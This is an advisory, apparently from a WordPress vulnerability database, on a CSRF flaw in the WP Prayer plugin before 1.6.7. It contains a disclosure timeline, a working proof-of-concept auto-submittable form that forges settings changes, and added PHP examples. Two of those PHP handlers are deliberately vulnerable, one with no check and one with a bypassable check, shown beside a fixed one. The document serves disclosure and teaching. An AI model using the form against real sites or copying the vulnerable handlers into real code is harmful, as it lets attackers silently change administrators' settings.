WP Prayer < 1.6.7 - Arbitrary Plugin Settings Update via CSRF

ID WPEX-ID:E4F17C7B-06A6-469D-A128-27A51E36493D
Type wpexploit
Reporter wpvulndb
Modified 2021-06-13T06:05:02


The plugin did not properly check for CSRF in some of its module functions, allowing an attacker to make a logged-in admin change all of the plugin's settings (including the email settings), for example. v1.6.6 fixed most of the CSRF checks, but the one in model.email_settings.php was improperly fixed (a bypass was still possible by providing a dummy nonce).

Timeline:
May 25th, 2021 - Vendor contacted
May 31st, 2021 - Escalated to WP due to unresponsive vendor
June 1st, 2021 - WP investigating
June 7th, 2021 - v1.6.6 released, fixing the logic except in model.email_settings.php. WP notified again about it
June 13th, 2021 - v1.6.7 released, fixing the remaining CSRF issue

    <form action="https://example.com/wp-admin/admin.php?page=wpe_manage_settings" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="wpe_prayer_form_title" value="CSRF Attack" />
      <input type="hidden" name="wpe_prayer_list_title" value="" />
      <input type="hidden" name="wpe_praise_list_title" value="" />
      <input type="hidden" name="wpe_num_prayer_per_page" value="" />
      <input type="hidden" name="wpe_prayer_btn_color" value="" />
      <input type="hidden" name="wpe_prayer_btn_text_color" value="" />
      <input type="hidden" name="wpe_pray_btn_color" value="" />
      <input type="hidden" name="wpe_pray_text_color" value="" />
      <input type="hidden" name="wpe_terms_and_condition" value="" />
      <input type="hidden" name="wpe_num_of_characters_in_message" value="" />
      <input type="hidden" name="wpe_prayer_Site_Key" value="" />
      <input type="hidden" name="wpe_prayer_secret_key" value="" />
      <input type="hidden" name="wpe_prayer_time_interval" value="" />
      <input type="hidden" name="wpe_categorylist" value="Deliverance,Generational Healing,Inner Healing,Physical Healing,Protection,Relationships,Salvation,Spiritual Healing" />
      <input type="hidden" name="wpe_fetch_req_from" value="all" />
      <input type="hidden" name="wpe_save_settings" value="Save Settings" />
      <input type="hidden" name="operation" value="save" />
      <input type="hidden" name="page_options" value="wpe_api_key,wpe_scripts_place" />
      <input type="submit" value="Submit request" />
    </form>
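The check that was missing, as an added illustration rather than the plugin's own code (the advisory does not show the contents of model.email_settings.php or of the handler behind admin.php?page=wpe_manage_settings): a minimal WordPress settings handler in three forms. The first has no CSRF check, which is what the hidden form above exploits; the second shows a hypothetical "improper fix" pattern that rejects a missing nonce but accepts any posted value, the class of bug the advisory describes as a dummy-nonce bypass; the third verifies the nonce against its action, checks the capability and sanitises the input. Field names come from the PoC; the option names, nonce action name, nonce field name and function names are assumptions.

```php
<?php
// Added illustration, not WP Prayer's code. Field names are from the advisory's
// PoC form; option keys, nonce action/field names and function names are assumed.

// 1) VULNERABLE: no CSRF check. Any page a logged-in admin visits can auto-submit
//    the hidden form from the advisory and the options are overwritten.
function wpe_save_settings_no_check() {
    if ( isset( $_POST['operation'] ) && 'save' === $_POST['operation'] ) {
        update_option( 'wpe_prayer_form_title', $_POST['wpe_prayer_form_title'] );
        update_option( 'wpe_fetch_req_from', $_POST['wpe_fetch_req_from'] );
    }
}

// 2) IMPROPERLY FIXED (hypothetical pattern, assumed for illustration): the code
//    only tests that *a* nonce field was posted and discards the result of
//    wp_verify_nonce(), so a forged form carrying name="_wpnonce" value="x"
//    is accepted exactly like a genuine one.
function wpe_save_settings_weak_check() {
    if ( empty( $_POST['_wpnonce'] ) ) {
        return; // a missing nonce is rejected, but any nonce value passes
    }
    wp_verify_nonce( $_POST['_wpnonce'], 'wpe_save_settings' ); // return value ignored
    update_option( 'wpe_prayer_form_title', $_POST['wpe_prayer_form_title'] );
}

// 3) FIXED: the nonce is verified against its action (check_admin_referer()
//    calls wp_verify_nonce() and wp_die()s on failure), the capability is
//    checked, and input is unslashed and sanitised before being stored.
function wpe_save_settings_secure() {
    if ( ! isset( $_POST['operation'] ) || 'save' !== $_POST['operation'] ) {
        return;
    }
    check_admin_referer( 'wpe_save_settings', 'wpe_settings_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wpe' ), '', array( 'response' => 403 ) );
    }
    $title = sanitize_text_field( wp_unslash( $_POST['wpe_prayer_form_title'] ?? '' ) );
    $from  = sanitize_key( wp_unslash( $_POST['wpe_fetch_req_from'] ?? 'all' ) );
    update_option( 'wpe_prayer_form_title', $title );
    update_option( 'wpe_fetch_req_from', $from );
}

// The legitimate settings page must emit the matching nonce field, otherwise
// the secure handler rejects the plugin's own form as well.
function wpe_render_settings_form() {
    $action = admin_url( 'admin.php?page=wpe_manage_settings' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'wpe_save_settings', 'wpe_settings_nonce' );
    echo '<input type="text" name="wpe_prayer_form_title" value="'
        . esc_attr( get_option( 'wpe_prayer_form_title', '' ) ) . '">';
    echo '<input type="hidden" name="operation" value="save">';
    submit_button( 'Save Settings', 'primary', 'wpe_save_settings' );
    echo '</form>';
}
```

The point of the second variant is that presence of a nonce field proves nothing: wp_verify_nonce() returns 1 or 2 for a valid nonce and false otherwise, and a handler that does not branch on that value is no better than one with no check. Because the nonce is bound to the logged-in user and to the action string, a cross-site page cannot produce one, which is what makes the third variant resistant to the advisory's form.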